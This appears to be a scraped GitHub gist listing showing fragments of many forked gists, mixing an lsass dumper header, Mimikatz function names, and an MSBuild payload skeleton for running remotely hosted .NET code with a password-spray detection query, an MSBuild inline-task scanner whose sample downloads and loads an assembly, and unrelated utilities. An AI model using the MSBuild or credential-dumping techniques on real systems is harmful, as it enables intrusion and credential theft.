
@cephurs
cephurs / autoProc.py
Created August 23, 2019 16:52 — forked from knavesec/autoProc.py
Automatic lsass dumper
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
cephurs / attack.csl
Created May 8, 2019 06:32 — forked from JohnLaTwC/attack.csl
Azure Sentinel Password spray query
let valid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoggedIn'
| summarize by ClientIP);
let only_invalid_logons = (OfficeActivity
| where TimeGenerated > ago(30d)
| where Operation == 'UserLoginFailed'
| summarize by ClientIP)
| join kind=anti (valid_logons) on ClientIP;
OfficeActivity
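The query above is cut off after its anti-join, so here is the same logic in Python, run over a constructed OfficeActivity-style sample. This is an added example, not the gist's code or anything from Azure Sentinel: `rows_in_window` is the `ago(30d)` filter, `only_invalid_logons` is the `join kind=anti`, and `spray_candidates` adds one assumption of mine (an IP that only ever fails, against several distinct accounts, is the spray signature) that the truncated query does not state. Rows, addresses and account names are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Fixed reference time so the constructed sample below is reproducible.
NOW = datetime(2019, 5, 8, 6, 32, tzinfo=timezone.utc)


def make_row(days_ago, operation, client_ip, user_id):
    """Build one OfficeActivity-style row with just the columns the query touches."""
    return {
        "TimeGenerated": NOW - timedelta(days=days_ago),
        "Operation": operation,
        "ClientIP": client_ip,
        "UserId": user_id,
    }


# Constructed sample data (not real tenant logs; addresses are RFC 5737 documentation ranges).
SAMPLE_ROWS = [
    make_row(1, "UserLoggedIn",    "203.0.113.10", "alice@example.com"),  # real user, one typo
    make_row(1, "UserLoginFailed", "203.0.113.10", "alice@example.com"),
    make_row(2, "UserLoginFailed", "198.51.100.7", "alice@example.com"),  # one IP, many accounts
    make_row(2, "UserLoginFailed", "198.51.100.7", "bob@example.com"),
    make_row(2, "UserLoginFailed", "198.51.100.7", "carol@example.com"),
    make_row(2, "UserLoginFailed", "198.51.100.7", "dave@example.com"),
    make_row(3, "UserLoginFailed", "192.0.2.44",   "erin@example.com"),   # one account, repeated
    make_row(3, "UserLoginFailed", "192.0.2.44",   "erin@example.com"),
    make_row(45, "UserLoginFailed", "192.0.2.99",  "frank@example.com"),  # outside the 30-day window
]


def rows_in_window(rows, now=NOW, days=30):
    """Equivalent of `where TimeGenerated > ago(30d)`."""
    cutoff = now - timedelta(days=days)
    return [r for r in rows if r["TimeGenerated"] > cutoff]


def only_invalid_logons(rows, now=NOW, days=30):
    """IPs with a UserLoginFailed and no UserLoggedIn in the window: the `join kind=anti`."""
    recent = rows_in_window(rows, now, days)
    valid = {r["ClientIP"] for r in recent if r["Operation"] == "UserLoggedIn"}
    failed = {r["ClientIP"] for r in recent if r["Operation"] == "UserLoginFailed"}
    return failed - valid


def spray_candidates(rows, now=NOW, days=30, min_distinct_users=3):
    """Of the only-failure IPs, keep those whose failures touched many distinct accounts.

    The distinct-user threshold is an assumption added in this example; the gist's query
    is cut off before it says what it does with the anti-joined IP list.
    """
    suspects = only_invalid_logons(rows, now, days)
    users_by_ip = defaultdict(set)
    for r in rows_in_window(rows, now, days):
        if r["Operation"] == "UserLoginFailed" and r["ClientIP"] in suspects:
            users_by_ip[r["ClientIP"]].add(r["UserId"])
    return {ip: len(users) for ip, users in users_by_ip.items()
            if len(users) >= min_distinct_users}


if __name__ == "__main__":
    print("only-failure IPs:", sorted(only_invalid_logons(SAMPLE_ROWS)))
    print("spray candidates:", spray_candidates(SAMPLE_ROWS))
```

The anti-join alone still flags the single-account brute force from 192.0.2.44; the distinct-user count is what separates a spray (one source, many accounts) from that, and from a legitimate user who mistyped once from an IP that also has a successful logon.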
// (ASCII-art banner reading BADKEYBOARD!)
// No Donut!
// Built from code by : https://gist.github.com/jiaaro and a twitter post from: https://twitter.com/zackwhittaker/status/1084554101625626624
// Not for malicious use. You assume all responsibility for anything you do with this. Don't be a jerk. If I find out you used this to hurt people,
// just remember TAKEN. Get what I'm sayin'?
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output
cephurs / dracula_theme.vt
Created December 10, 2018 18:30 — forked from grugq/dracula_theme.vt
Dracula theme for the Linux console
# Dracula Theme for Consoles
#
# Console colors are set by the `setvtrgb` command which takes as argument a
# file of exactly three lines of text. These lines are the 0..255 values for
#
# red: black,red,green,yellow,blue,magenta,cyan,white,bold_black,bold_red,bold_green,bold_yellow,bold_blue,bold_magenta,bold_cyan,bold_white
# grn: black,red,green,yellow,blue,magenta,cyan,white,bold_black,bold_red,bold_green,bold_yellow,bold_blue,bold_magenta,bold_cyan,bold_white
# blu: black,red,green,yellow,blue,magenta,cyan,white,bold_black,bold_red,bold_green,bold_yellow,bold_blue,bold_magenta,bold_cyan,bold_white
#
# Needless to say, this is a very annoying format. Here are the values for
cephurs / Instructions.txt
Created December 2, 2018 14:53 — forked from NotMedic/Instructions.txt
Siri -> HomeBridge -> HomeBridge-ssh -> iptables
This is a pretty simple setup:
Siri is used to control Homebridge using the HomeKit protocol.
Homebridge has a module named Homebridge-ssh that allows you to run commands over ssh.
There is a shell script on an OpenWrt box to enable, disable, and check the status of a MAC Address block in the FORWARD table.
1. Install node on your platform. I went with 8.9 for no specific reason other than I initially had issues with 10 that probably weren't related.
2. Install homebridge and homebridge-ssh. You should probably also put homebridge-config-ui-x on there too... I used the unsafe-perm parameter after getting a significant number of errors:
sudo -i npm install -g homebridge --unsafe-perm
sudo -i npm install -g homebridge-ssh --unsafe-perm
cephurs / msBuildDemo.xml
Created November 27, 2018 23:21 — forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="DemoClass">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
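The fragment above stops inside the `<Code>` element, but the structure it shows (a `UsingTask` with `TaskFactory="CodeTaskFactory"` and a `Code Type="Class"` body) is what a defender can key on: `msbuild.exe` will compile and run that class as part of the build. The scanner below is an added example written for this page, not the gist's code or any Microsoft tooling. It parses a project file and reports those indicators plus a short list of call names that rarely belong in a build script. The suspect sample copies the gist's visible skeleton, but its class body is a stand-in I wrote so the scanner has something to match; the benign sample and the `SUSPICIOUS_CALLS` list are likewise my assumptions.

```python
import xml.etree.ElementTree as ET

# Task factories that compile and run source embedded in the project file itself.
INLINE_TASK_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}

# Substrings in inline code that, in a build script, usually mean "fetch and run something else".
# Assumed indicator list for this example; tune it to your environment.
SUSPICIOUS_CALLS = ("Assembly.Load", "System.Reflection", "WebClient",
                    "DownloadData", "HttpClient", "VirtualAlloc")

# Constructed sample in the shape of the gist above. The class body is a stand-in written
# for this example (the real gist is truncated on the page), not the gist's code.
SUSPECT_PROJECT = r"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="DemoClass">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        public class ClassExample : Microsoft.Build.Utilities.Task {
          public override bool Execute() {
            var bytes = new System.Net.WebClient().DownloadData("http://example.invalid/x");
            System.Reflection.Assembly.Load(bytes);
            return true;
          }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>"""

# Constructed benign project: an ordinary target, no UsingTask at all.
BENIGN_PROJECT = r"""<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <Message Text="hello" />
  </Target>
</Project>"""


def _qualify(root, tag):
    """MSBuild files may or may not carry the 2003 namespace; build the matching tag name."""
    if root.tag.startswith("{"):
        return "{%s}%s" % (root.tag[1:].split("}")[0], tag)
    return tag


def scan_msbuild_project(xml_text):
    """Return (task_name, reason) findings for inline-task indicators in an MSBuild project."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root.iter(_qualify(root, "UsingTask")):
        name = task.get("TaskName", "?")
        factory = task.get("TaskFactory", "")
        if factory in INLINE_TASK_FACTORIES:
            findings.append((name, "inline task factory " + factory))
        for code in task.iter(_qualify(root, "Code")):
            if code.get("Type") == "Class":
                findings.append((name, 'whole class compiled at build time (Code Type="Class")'))
            body = code.text or ""
            for needle in SUSPICIOUS_CALLS:
                if needle in body:
                    findings.append((name, "inline code references " + needle))
    return findings


if __name__ == "__main__":
    for task_name, reason in scan_msbuild_project(SUSPECT_PROJECT):
        print("%s: %s" % (task_name, reason))
    print("benign findings:", scan_msbuild_project(BENIGN_PROJECT))
```

Inline tasks are a legitimate MSBuild feature, so a `CodeTaskFactory` hit on its own is a triage lead rather than a verdict; the combination with network or reflection calls, or with `msbuild.exe` launched from a user-writable path, is what should page someone. SDK-style projects drop the `xmlns`, which is why the tag lookup handles both forms.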
cephurs / delete-twitter-dm.js
Created November 7, 2018 14:50 — forked from taviso/delete-twitter-dm.js
Automate deleting twitter direct messages.
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
clearInterval(tmr)
return;
}
dm.firstChild.click();
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
cephurs / pinger.bat
Created October 30, 2018 13:44 — forked from shhivam/pinger.bat
@ECHO OFF
REM Host to ping; replace x.x.x.x with the target address
set IPADDRESS=x.x.x.x
REM Seconds to wait between ping runs
set INTERVAL=3
:PINGINTERVAL
ping %IPADDRESS%
timeout /t %INTERVAL% /nobreak
GOTO PINGINTERVAL
cephurs / picanha.py
Created September 23, 2018 15:19 — forked from tmap/picanha.py
import os
import sys

import requests
import shodan

# Read the key from the environment rather than committing it in the script;
# the placeholder "apitoken" is kept only as the fallback the original used.
API_KEY = os.environ.get("SHODAN_API_KEY", "apitoken")
try:
    api = shodan.Shodan(API_KEY)
    result = api.search('port:3000 product:"Apache httpd" centOS')
except shodan.APIError as e:
    sys.exit("Shodan error: %s" % e)